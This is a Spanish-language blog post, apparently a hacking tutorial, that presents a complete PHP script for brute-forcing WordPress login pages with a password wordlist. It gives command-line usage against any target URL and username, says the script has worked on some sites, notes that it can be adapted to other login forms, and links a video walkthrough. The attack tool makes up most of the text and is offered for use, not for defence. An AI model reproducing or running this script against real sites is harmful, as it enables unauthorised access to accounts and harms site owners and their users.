WordPress no cuenta con un captcha por defecto ni tampoco con login throttling, o algo que limite los intentos de ingreso de usuario y clave para los usuarios, por lo que practicar fuerza bruta para ingresar como alguno de los usuarios registrados es algo que podemos intentar. Muchos sistemas de ingreso no cuentan con este tipo de proteccion o validacion, por lo que este escript no solo se puede usar contra wordpress.

Hemos escrito un pequeño programa en PHP que nos permitira hacer post al sistema de login de wordpress probando claves desde un diccionario de palabras.

1. < ?php
2. ini_set("memory_limit", "100M");
3. function crackSite($wordlist, $url, $user, $attemps = 0)
4. {
5.         if($file = file($wordlist))
6.                 print "Read ".count($file)." words.n";
7.         else
8.         {
9.                 print "Can’t read word list file.n";
10.                 die();
11.         }
12.         $i = 0;
13.         rtrim($fields_string,‘&amp;’);
14.         foreach($file as $word)
15.         {
16.                 if(++$i%10 == 0)
17.                         print "Attempts: ".$i."/".count($file)." (".trim($word).")n";
18.                 $fields_string = "log=".$user."&amp;pwd=".trim($word);
19.                 $ch = curl_init();
20.                 curl_setopt($ch,CURLOPT_URL,$url);
21.                 curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
22.                 curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
23.                 $result = md5( curl_exec($ch) );
24.                 if(!$oresult) $oresult = $result;
25.                 if($oresult != $result)
26.                 {
27.                         print "Password found: ".$word."n";
28.                         die();
29.                 }
30.                 curl_close($ch);
31.         }
32. }
33. crackSite($argv[1], $argv[2], $argv[3]);
34. ?>

Este script esta diseñado para correrlo desde la linea de comandos (php-cli) y su modo de uso es el siguiente:

$ php wp_cracker.php wordlist.txt https://sitio.com/wp-login.php Username

Notese que el script en ningun momento valida datos de entrada y salida, por lo que depende de la persona que lo ejecute que los parametros esten bien. Se ha probado este script con algunos sitios y ha funcionado, puede que para otros sitios sea necesario hacer algunas modificaciones. El primer parametro corresponde al fichero que contiene nuestro diccionario de palabras, el segundo a la URL que el script debe hacer post y el tercero al usuario.
Lo unico que debemos saber es el nombre de usuario que existe en el registro del sitio. Para intentar ingresar a otros sitios es necesario modificar el codigo fuente y cambiar los nombres de los campos.

Requerimientos: Curl y PHP.

Video tutorial:

httpvh://www.youtube.com/watch?v=CMfxsGQOtd8

Descargar video:
Mirror 1: Hardmodding (2.8M)